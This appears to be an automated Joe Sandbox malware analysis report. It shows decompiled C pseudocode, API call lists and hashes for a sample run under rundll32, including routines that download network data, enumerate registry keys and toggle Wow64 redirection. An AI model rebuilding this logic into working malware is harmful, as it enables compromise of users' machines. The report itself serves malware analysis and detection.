                                                            • Part of subcall function 00E5254C: wsprintfA.USER32 ref: 00E5264F
                                                          • HeapFree.KERNEL32(00000000,{Q,?,?,{Q,?), ref: 00E55303
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: wsprintf$Heap$AllocateCountFreeTick
                                                          • String ID: {Q
                                                          • API String ID: 2794511967-1336059103
                                                          • Opcode ID: 9092bf540566d072ae3b5388a799c203d7245e53e39d04977bce390007414eef
                                                          • Instruction ID: ac0f40a5d0b0fbfe93e0aa7f4871a5f4c2d15250f334f43a88151f04ed23c863
                                                          • Opcode Fuzzy Hash: 9092bf540566d072ae3b5388a799c203d7245e53e39d04977bce390007414eef
                                                          • Instruction Fuzzy Hash: 80317F76500209EFCB05DF65DC45ADA37BCFB48346F144922FA05FB261D7709A08CBA2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 62%
                                                          			E00E513E1(void* __eax) {
                                                          				long _v8;
                                                          				char _v12;
                                                          				char _v16;
                                                          				intOrPtr _v20;
                                                          				void* _v24;
                                                          				void* __esi;
                                                          				void* _t41;
                                                          				char* _t42;
                                                          				long _t43;
                                                          				void* _t46;
                                                          				intOrPtr _t47;
                                                          				intOrPtr* _t48;
                                                          				char _t50;
                                                          				long _t54;
                                                          				char* _t55;
                                                          				long _t56;
                                                          				intOrPtr* _t57;
                                                          				void* _t60;
                                                          				void* _t61;
                                                          				void* _t68;
                                                          				void* _t72;
                                                          				void* _t73;
                                                          				void* _t74;
                                                          				void* _t78;
                                                          
                                                          				_t72 = __eax;
                                                          				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
                                                          					L2:
                                                          					_t41 = _t72;
                                                          					_pop(_t73);
                                                          					_t74 = _t41;
                                                          					_t42 =  &_v12;
                                                          					_v8 = 0;
                                                          					_v16 = 0;
                                                          				__imp__( *((intOrPtr*)(_t74 + 0x18)), _t42, _t68, _t73, _t61, _t78); // unresolved import called as (handle at +0x18, &bytesAvailable): the shape of InternetQueryDataAvailable (inference; the extra register arguments are decompiler noise)
                                                          				if(_t42 == 0) {
                                                          					_t43 = GetLastError();
                                                          					_v8 = _t43;
                                                          					if(_t43 == 0x2efe) { // 12030 = ERROR_INTERNET_CONNECTION_ABORTED: treated as end of data, not as failure
                                                          							_v8 = 0;
                                                          							goto L29;
                                                          						}
                                                          					} else {
                                                          						if(_v12 == 0) {
                                                          							L29:
                                                          							 *((intOrPtr*)(_t74 + 0x30)) = 0;
                                                          						} else {
                                                          							_t46 =  *0xe5a144(0, 1,  &_v24); // executed; (NULL, TRUE, &stream) is the argument shape of CreateStreamOnHGlobal (inference), _v24 is used as a COM object below
                                                          							if(_t46 != 0) {
                                                          								_v8 = 8;
                                                          							} else {
                                                          								_t47 = E00E55FBC(0x1000);
                                                          								_v20 = _t47;
                                                          								if(_t47 == 0) {
                                                          									_v8 = 8;
                                                          								} else {
                                                          									goto L8;
                                                          									do {
                                                          										while(1) {
                                                          											L8:
                                                          											_t50 = _v12;
                                                          											if(_t50 >= 0x1000) {
                                                          												_t50 = 0x1000;
                                                          											}
                                                          											__imp__( *((intOrPtr*)(_t74 + 0x18)), _v20, _t50,  &_v16); // unresolved import called as (handle, buffer, min(available, 0x1000), &bytesRead): the shape of InternetReadFile (inference)
                                                          											if(_t50 == 0) {
                                                          												break;
                                                          											}
                                                          											_t57 = _v24;
                                                          											 *((intOrPtr*)( *_t57 + 0x10))(_t57, _v20, _v16, 0); // vtable slot 4 (+0x10) with (buf, len, NULL): IStream::Write, appending the chunk to the stream
                                                          											_t18 =  &_v12;
                                                          											 *_t18 = _v12 - _v16;
                                                          											if( *_t18 != 0) {
                                                          												continue;
                                                          											} else {
                                                          											}
                                                          											L14:
                                                          											if(WaitForSingleObject( *0xe5a2c4, 0) != 0x102) { // 0x102 = WAIT_TIMEOUT: keep reading only while the global event at 0xe5a2c4 is not signalled
                                                          												_v8 = 0x102;
                                                          											} else {
                                                          												_t55 =  &_v12;
                                                          												__imp__( *((intOrPtr*)(_t74 + 0x18)), _t55); // executed
                                                          												if(_t55 != 0) {
                                                          													goto L19;
                                                          												} else {
                                                          													_t56 = GetLastError();
                                                          													_v8 = _t56;
                                                          													if(_t56 == 0x2f78 && _v12 == 0) { // 12152 = ERROR_HTTP_INVALID_SERVER_RESPONSE with nothing left to read: accepted as a clean end
                                                          														_v8 = 0;
                                                          														goto L19;
                                                          													}
                                                          												}
                                                          											}
                                                          											L22:
                                                          											E00E513CC(_v20);
                                                          											if(_v8 == 0) {
                                                          												_t54 = E00E51675(_v24, _t74); // executed
                                                          												_v8 = _t54;
                                                          											}
                                                          											goto L25;
                                                          										}
                                                          										_v8 = GetLastError();
                                                          										goto L14;
                                                          										L19:
                                                          									} while (_v12 != 0);
                                                          									goto L22;
                                                          								}
                                                          								L25:
                                                          								_t48 = _v24;
                                                          								 *((intOrPtr*)( *_t48 + 8))(_t48);
                                                          							}
                                                          						}
                                                          					}
                                                          					return _v8;
                                                          				} else {
                                                          					_t60 = E00E5142C(__eax); // executed
                                                          					if(_t60 != 0) {
                                                          						return _t60;
                                                          					} else {
                                                          						goto L2;
                                                          					}
                                                          				}
                                                          			}

                                                          0x00e513e2
                                                          0x00e513e8
                                                          0x00e513f3
                                                          0x00e513f3
                                                          0x00e513f5
                                                          0x00e51eab
                                                          0x00e51eae
                                                          0x00e51eb7
                                                          0x00e51eba
                                                          0x00e51ebd
                                                          0x00e51ec5
                                                          0x00e51fc3
                                                          0x00e51fce
                                                          0x00e51fd1
                                                          0x00e51fd3
                                                          0x00000000
                                                          0x00e51fd3
                                                          0x00e51ecb
                                                          0x00e51ece
                                                          0x00e51fd6
                                                          0x00e51fd6
                                                          0x00e51ed4
                                                          0x00e51edb
                                                          0x00e51ee3
                                                          0x00e51fba
                                                          0x00e51ee9
                                                          0x00e51eef
                                                          0x00e51ef6
                                                          0x00e51ef9
                                                          0x00e51fa8
                                                          0x00e51eff
                                                          0x00000000
                                                          0x00e51eff
                                                          0x00e51eff
                                                          0x00e51eff
                                                          0x00e51eff
                                                          0x00e51f04
                                                          0x00e51f06
                                                          0x00e51f06
                                                          0x00e51f13
                                                          0x00e51f1b
                                                          0x00000000
                                                          0x00000000
                                                          0x00e51f1d
                                                          0x00e51f2a
                                                          0x00e51f30
                                                          0x00e51f30
                                                          0x00e51f33
                                                          0x00000000
                                                          0x00000000
                                                          0x00e51f35
                                                          0x00e51f40
                                                          0x00e51f54
                                                          0x00e51f8a
                                                          0x00e51f56
                                                          0x00e51f56
                                                          0x00e51f5d
                                                          0x00e51f65
                                                          0x00000000
                                                          0x00e51f67
                                                          0x00e51f67
                                                          0x00e51f72
                                                          0x00e51f75
                                                          0x00e51f7c
                                                          0x00000000
                                                          0x00e51f7c
                                                          0x00e51f75
                                                          0x00e51f65
                                                          0x00e51f8d
                                                          0x00e51f90
                                                          0x00e51f98
                                                          0x00e51f9e
                                                          0x00e51fa3
                                                          0x00e51fa3
                                                          0x00000000
                                                          0x00e51f98
                                                          0x00e51f3d
                                                          0x00000000
                                                          0x00e51f7f
                                                          0x00e51f7f
                                                          0x00000000
                                                          0x00e51f88
                                                          0x00e51faf
                                                          0x00e51faf
                                                          0x00e51fb5
                                                          0x00e51fb5
                                                          0x00e51ee3
                                                          0x00e51ece
                                                          0x00e51fe0
                                                          0x00e513ea
                                                          0x00e513ea
                                                          0x00e513f1
                                                          0x00e513fc
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e513f1

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00E54AFA,00000000,?), ref: 00E51F47
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00E54AFA,00000000,?,?), ref: 00E51F67
                                                            • Part of subcall function 00E5142C: wcstombs.NTDLL ref: 00E514EC
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastObjectSingleWaitwcstombs
                                                          • String ID:
                                                          • API String ID: 2344289193-0
                                                          • Opcode ID: 5200f66bf2567547697b542b1343e5cdd29a02be7c445ca26cdb4f66ed1a6580
                                                          • Instruction ID: 1ff0bac765acffd4067778c0783f631f83f73d535e526e5f9d978cc75fc983d9
                                                          • Opcode Fuzzy Hash: 5200f66bf2567547697b542b1343e5cdd29a02be7c445ca26cdb4f66ed1a6580
                                                          • Instruction Fuzzy Hash: E2411C71A00209EFDF109F95D984AEEB7B9FF0434AF2458A9E902F6151D7349E489B21
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • memset.NTDLL ref: 0558AE6E
                                                          • ResumeThread.KERNEL32(?,?,00000004,00000004,?), ref: 0558AEF8
                                                          • WaitForSingleObject.KERNEL32(00000064), ref: 0558AF06
                                                          • SuspendThread.KERNEL32(?), ref: 0558AF19
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Thread$ObjectResumeSingleSuspendWaitmemset
                                                          • String ID:
                                                          • API String ID: 3168247402-0
                                                          • Opcode ID: 2c6862ce3a20b0929b34beb9e1ee41b74400428d4f829a94b4205b28945b9cc8
                                                          • Instruction ID: 013ff5213463d52ebec9843d61ada95777c27a71dfba83cd3d86485c983ab726
                                                          • Opcode Fuzzy Hash: 2c6862ce3a20b0929b34beb9e1ee41b74400428d4f829a94b4205b28945b9cc8
                                                          • Instruction Fuzzy Hash: 244153B1108342AFD711EF54C845D7BBBE9FF88360F04492EFA95A1160D731D954DB62
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 00E54CF6
                                                          • SysAllocString.OLEAUT32(00E554F6), ref: 00E54D39
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E54D4D
                                                          • SysFreeString.OLEAUT32(00000000), ref: 00E54D5B
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: f680b2d3ab0156a53f580f55fe9b7f665deabe879547fa14a82a00cdfafdd0b6
                                                          • Instruction ID: 1aa696dfa8c756058fb5cacbb62f9f8d9491baaa344eb0be633719772ee96022
                                                          • Opcode Fuzzy Hash: f680b2d3ab0156a53f580f55fe9b7f665deabe879547fa14a82a00cdfafdd0b6
                                                          • Instruction Fuzzy Hash: 3F312DB1900209EFCB05DF98D8848EE7BB5FF4834AB10882EF905B7250D7759A89CF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E53D85(void* __ecx, intOrPtr _a4) {
                                                          				int* _v8;
                                                          				int _v12;
                                                          				int* _v16;
                                                          				int _v20;
                                                          				int* _v24;
                                                          				char* _v28;
                                                          				void* _v32;
                                                          				long _t33;
                                                          				char* _t35;
                                                          				long _t39;
                                                          				long _t42;
                                                          				intOrPtr _t47;
                                                          				void* _t51;
                                                          				long _t53;
                                                          
                                                          				_t51 = __ecx;
                                                          				_v8 = 0;
                                                          				_v16 = 0;
                                                          				_v12 = 0;
                                                          				_v24 = 0;
                                                          				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
                                                          				_t53 = _t33;
                                                          				if(_t53 != 0) {
                                                          					L18:
                                                          					return _t53;
                                                          				}
                                                          				_t53 = 8;
                                                          				_t35 = E00E55FBC(0x104);
                                                          				_v28 = _t35;
                                                          				if(_t35 == 0) {
                                                          					L17:
                                                          					RegCloseKey(_v32);
                                                          					goto L18;
                                                          				}
                                                          				_v20 = 0x104;
                                                          				do {
                                                          					_v16 = _v20;
                                                          					_v12 = 0x104;
                                                          					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
                                                          					_t53 = _t39;
                                                          					if(_t53 != 0xea) {
                                                          						if(_t53 != 0) {
                                                          							L14:
                                                          							if(_t53 == 0x103) {
                                                          								_t53 = 0;
                                                          							}
                                                          							L16:
                                                          							E00E513CC(_v28);
                                                          							goto L17;
                                                          						}
                                                          						_t42 = E00E55448(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
                                                          						_t53 = _t42;
                                                          						if(_t53 != 0) {
                                                          							goto L14;
                                                          						}
                                                          						goto L12;
                                                          					}
                                                          					if(_v12 <= 0x104) {
                                                          						if(_v16 <= _v20) {
                                                          							goto L16;
                                                          						}
                                                          						E00E513CC(_v24);
                                                          						_v20 = _v16;
                                                          						_t47 = E00E55FBC(_v16);
                                                          						_v24 = _t47;
                                                          						if(_t47 != 0) {
                                                          							L6:
                                                          							_t53 = 0;
                                                          							goto L12;
                                                          						}
                                                          						_t53 = 8;
                                                          						goto L16;
                                                          					}
                                                          					_v8 = _v8 + 1;
                                                          					goto L6;
                                                          					L12:
                                                          				} while (WaitForSingleObject( *0xe5a2c4, 0) == 0x102);
                                                          				goto L16;
                                                          			}

                                                          0x00e53d85
                                                          0x00e53d9f
                                                          0x00e53da2
                                                          0x00e53da5
                                                          0x00e53da8
                                                          0x00e53dab
                                                          0x00e53db1
                                                          0x00e53db5
                                                          0x00e53e8f
                                                          0x00e53e93
                                                          0x00e53e93
                                                          0x00e53dbe
                                                          0x00e53dc5
                                                          0x00e53dcc
                                                          0x00e53dcf
                                                          0x00e53e84
                                                          0x00e53e87
                                                          0x00000000
                                                          0x00e53e8d
                                                          0x00e53dd5
                                                          0x00e53dd8
                                                          0x00e53ddf
                                                          0x00e53de9
                                                          0x00e53df2
                                                          0x00e53df8
                                                          0x00e53e00
                                                          0x00e53e38
                                                          0x00e53e72
                                                          0x00e53e78
                                                          0x00e53e7a
                                                          0x00e53e7a
                                                          0x00e53e7c
                                                          0x00e53e7f
                                                          0x00000000
                                                          0x00e53e7f
                                                          0x00e53e4d
                                                          0x00e53e52
                                                          0x00e53e56
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00e53e56
                                                          0x00e53e05
                                                          0x00e53e14
                                                          0x00000000
                                                          0x00000000
                                                          0x00e53e19
                                                          0x00e53e22
                                                          0x00e53e25
                                                          0x00e53e2c
                                                          0x00e53e2f
                                                          0x00e53e0a
                                                          0x00e53e0a
                                                          0x00000000
                                                          0x00e53e0a
                                                          0x00e53e33
                                                          0x00000000
                                                          0x00e53e33
                                                          0x00e53e07
                                                          0x00000000
                                                          0x00e53e58
                                                          0x00e53e65
                                                          0x00000000

                                                          APIs
                                                          • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00E5755B,?), ref: 00E53DAB
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • RegEnumKeyExA.KERNEL32(?,?,?,00E5755B,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00E5755B), ref: 00E53DF2
                                                          • WaitForSingleObject.KERNEL32(00000000,?,?,?,00E5755B,?,00E5755B,?,?,?,?,?,00E5755B,?), ref: 00E53E5F
                                                          • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00E5755B,?,?,?,?,yE,00E5519C,?), ref: 00E53E87
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                                          • String ID:
                                                          • API String ID: 3664505660-0
                                                          • Opcode ID: b17a925ea98c26ddb56831f115629c3804ae8abd9ec9b585cc4900051c9b9b08
                                                          • Instruction ID: 72832b2e1d525a5acf905c95894c647bfc9faf32ce880f93a57f0def97c22ceb
                                                          • Opcode Fuzzy Hash: b17a925ea98c26ddb56831f115629c3804ae8abd9ec9b585cc4900051c9b9b08
                                                          • Instruction Fuzzy Hash: 21316B72D00219AACF21ABA5CC468EFFFF9EF44356F105966EA11B2160C7704E48DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E541D4(void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                          				int _v12;
                                                          				signed int _v16;
                                                          				void* _v20;
                                                          				signed char _v36;
                                                          				void* _t24;
                                                          				intOrPtr _t27;
                                                          				void* _t35;
                                                          				signed int _t38;
                                                          				signed char* _t46;
                                                          				int _t53;
                                                          				void* _t55;
                                                          				void* _t56;
                                                          				void* _t57;
                                                          
                                                          				_v16 = _v16 & 0x00000000;
                                                          				_t46 = _a4;
                                                          				_t53 = ( *_t46 & 0x000000ff) + 0x110;
                                                          				_v12 = 0x110;
                                                          				_t24 = E00E55FBC(_t53);
                                                          				_a4 = _t24;
                                                          				if(_t24 != 0) {
                                                          					memcpy(_t24,  *0xe5a324, 0x110);
                                                          					_t27 =  *0xe5a328; // 0x0
                                                          					_t57 = _t56 + 0xc;
                                                          					if(_t27 != 0) {
                                                          						_t51 = _a4;
                                                          						E00E576A8(0x110, _a4, _a4, _t27, 0);
                                                          					}
                                                          					if(E00E5773D( &_v36) != 0) {
                                                          						_t35 = E00E53276(0x110, 0,  &_v36, _a4,  &_v20,  &_v12); // executed
                                                          						if(_t35 == 0) {
                                                          							_t55 = _v20;
                                                          							_v36 =  *_t46;
                                                          							_t38 = E00E52879(_t55, _a8, _t51, _t46, _a12); // executed
                                                          							_v16 = _t38;
                                                          							 *(_t55 + 4) = _v36;
                                                          							memset(_t55, 0, _v12 - (_t46[4] & 0xf));
                                                          							_t57 = _t57 + 0xc;
                                                          							E00E513CC(_t55);
                                                          						}
                                                          					}
                                                          					memset(_a4, 0, _t53);
                                                          					E00E513CC(_a4);
                                                          				}
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00E55FBC: RtlAllocateHeap.NTDLL(00000000,00000000,00E52035), ref: 00E55FC8
                                                          • memcpy.NTDLL(00000000,00000110,{Q,{Q,?,?,?,?,?,00E552EA,?), ref: 00E5420A
                                                          • memset.NTDLL ref: 00E54280
                                                          • memset.NTDLL ref: 00E54294
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: memset$AllocateHeapmemcpy
                                                          • String ID: {Q
                                                          • API String ID: 1529149438-1336059103
                                                          • Opcode ID: 85107b581536394dadc9def030a34b3a8db74c6ea84b9f3653a446e48cda925b
                                                          • Instruction ID: 826d4463de050abea9dd978aef9cffd56bc3f237d2092b444badb31bbbf0a5d8
                                                          • Opcode Fuzzy Hash: 85107b581536394dadc9def030a34b3a8db74c6ea84b9f3653a446e48cda925b
                                                          • Instruction Fuzzy Hash: 37217F76A00628ABDF01AFA5DC41FAEBBF8AF08345F045865FD04F6251D734DA588BA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00E53B91(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
                                                          				long _t26;
                                                          				intOrPtr* _t38;
                                                          				char* _t42;
                                                          				long _t43;
                                                          
                                                          				if(_a4 == 0) {
                                                          					L2:
                                                          					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
                                                          					_t43 = _t26;
                                                          					if(_t43 == 0) {
                                                          						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
                                                          						if(_a4 == 0) {
                                                          							_t43 = 0xe8;
                                                          						} else {
                                                          							_t42 = E00E55FBC(_a4);
                                                          							if(_t42 == 0) {
                                                          								_t43 = 8;
                                                          							} else {
                                                          								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
                                                          								if(_t43 != 0) {
                                                          									E00E513CC(_t42);
                                                          								} else {
                                                          									 *_a20 = _t42;
                                                          									_t38 = _a24;
                                                          									if(_t38 != 0) {
                                                          										 *_t38 = _a4;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						RegCloseKey(_a12);
                                                          					}
                                                          					L12:
                                                          					return _t43;
                                                          				}
                                                          				_t43 = E00E531D9(_a4, _a8, _a12, _a16, _a20, _a24);
                                                          				if(_t43 == 0) {
                                                          					goto L12;
                                                          				}
                                                          				goto L2;
                                                          			}

                                                          APIs
                                                          • RegOpenKeyW.ADVAPI32(80000002,051B9DC4,051B9DC4), ref: 00E53BCA
                                                          • RegQueryValueExW.KERNEL32(051B9DC4,?,00000000,80000002,00000000,00000000,?,00E55527,3D00E590,80000002,00E5755B,00000000,00E5755B,?,051B9DC4,80000002), ref: 00E53BEC
                                                          • RegQueryValueExW.ADVAPI32(051B9DC4,?,00000000,80000002,00000000,00000000,00000000,?,00E55527,3D00E590,80000002,00E5755B,00000000,00E5755B,?,051B9DC4), ref: 00E53C11
                                                          • RegCloseKey.ADVAPI32(051B9DC4,?,00E55527,3D00E590,80000002,00E5755B,00000000,00E5755B,?,051B9DC4,80000002,00000000,?), ref: 00E53C41
                                                            • Part of subcall function 00E531D9: SafeArrayDestroy.OLEAUT32(00000000), ref: 00E5325E
                                                            • Part of subcall function 00E513CC: RtlFreeHeap.NTDLL(00000000,00000000,00E520F3,00000000,00000000,?,00000000,?,?,?,?,?,00E568A9,00000000,?,00000001), ref: 00E513D8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                                          • String ID:
                                                          • API String ID: 486277218-0
                                                          • Opcode ID: a5f3157a182768d3e2217cb337b777ebfce09c801b82ca56b446cbbbdb031cbb
                                                          • Instruction ID: 83594663a0c86cf0356451c85ea2bb5b956d27c32a39a98aff8975f1e9212148
                                                          • Opcode Fuzzy Hash: a5f3157a182768d3e2217cb337b777ebfce09c801b82ca56b446cbbbdb031cbb
                                                          • Instruction Fuzzy Hash: F2213C7300015EBFCF119FA4DC80CEEBBA9EB04396B049825FE15B7120D2319E689BA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?), ref: 055720A7
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 055720BE
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 055720D9
                                                          • RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?), ref: 055720F8
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.743135390.0000000005570000.00000040.00020000.sdmp, Offset: 05570000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_5570000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: HeapQueryValue$AllocateFree
                                                          • String ID:
                                                          • API String ID: 4267586637-0
                                                          • Opcode ID: fed4088281ddee6424c35749fc38bf41269aac50afe2b8f82dac06e5db5734f8
                                                          • Instruction ID: 8eb0f4b25cf9d150551da92e332fcd9da2c8b6a7cd250a58a89c3aabb8099c9c
                                                          • Opcode Fuzzy Hash: fed4088281ddee6424c35749fc38bf41269aac50afe2b8f82dac06e5db5734f8
                                                          • Instruction Fuzzy Hash: 61111C7A500118FFDB229F85EC85CEEBFBDFB89250F114056F90292110D7716E84DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 32%
                                                          			E00E5663C(intOrPtr __eax, intOrPtr __edi, long _a4, intOrPtr _a8) {
                                                          				intOrPtr _v36;
                                                          				intOrPtr _v44;
                                                          				intOrPtr _v48;
                                                          				intOrPtr _v52;
                                                          				void _v60;
                                                          				char _v64;
                                                          				long _t18;
                                                          				intOrPtr _t22;
                                                          				intOrPtr _t23;
                                                          				long _t29;
                                                          				intOrPtr _t30;
                                                          				intOrPtr _t31;
                                                          				intOrPtr* _t32;
                                                          
                                                          				_t30 = __edi;
                                                          				_t29 = _a4;
                                                          				_t31 = __eax;
                                                          				_t18 = E00E54DA1(_t29, __edi, __eax); // executed
                                                          				_a4 = _t18;
                                                          				if(_t18 != 0) {
                                                          					memset( &_v60, 0, 0x38);
                                                          					_t22 =  *0xe5a2d4; // 0x435d5a8
                                                          					_v64 = 0x3c;
                                                          					if(_a8 == 0) {
                                                          						_t7 = _t22 + 0xe5b4e0; // 0x70006f
                                                          						_t23 = _t7;
                                                          					} else {
                                                          						_t6 = _t22 + 0xe5b90c; // 0x750072
                                                          						_t23 = _t6;
                                                          					}
                                                          					_v36 = _t31;
                                                          					_t32 = __imp__;
                                                          					_v52 = _t23;
                                                          					_v48 = _t29;
                                                          					_v44 = _t30;
                                                          					 *_t32(0);
                                                          					_push( &_v64);
                                                          					if( *0xe5a100() != 0) {
                                                          						_a4 = _a4 & 0x00000000;
                                                          					} else {
                                                          						_a4 = GetLastError();
                                                          					}
                                                          					 *_t32(1);
                                                          				}
                                                          				return _a4;
                                                          			}

                                                          APIs
                                                            • Part of subcall function 00E54DA1: SysAllocString.OLEAUT32(?), ref: 00E54DFD
                                                            • Part of subcall function 00E54DA1: SysAllocString.OLEAUT32(0070006F), ref: 00E54E11
                                                            • Part of subcall function 00E54DA1: SysAllocString.OLEAUT32(00000000), ref: 00E54E23
                                                            • Part of subcall function 00E54DA1: SysFreeString.OLEAUT32(00000000), ref: 00E54E87
                                                          • memset.NTDLL ref: 00E56660
                                                          • Wow64EnableWow64FsRedirection.KERNEL32(00000000), ref: 00E5669C
                                                          • GetLastError.KERNEL32 ref: 00E566AC
                                                          • Wow64EnableWow64FsRedirection.KERNEL32(00000001), ref: 00E566BD
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.738756359.0000000000E51000.00000020.00020000.sdmp, Offset: 00E50000, based on PE: true
                                                          • Associated: 00000015.00000002.738720079.0000000000E50000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738826659.0000000000E59000.00000002.00020000.sdmp
                                                          • Associated: 00000015.00000002.738873414.0000000000E5A000.00000004.00020000.sdmp
                                                          • Associated: 00000015.00000002.738891661.0000000000E5C000.00000002.00020000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_e50000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: StringWow64$Alloc$EnableRedirection$ErrorFreeLastmemset
                                                          • String ID:
                                                          • API String ID: 593937197-0
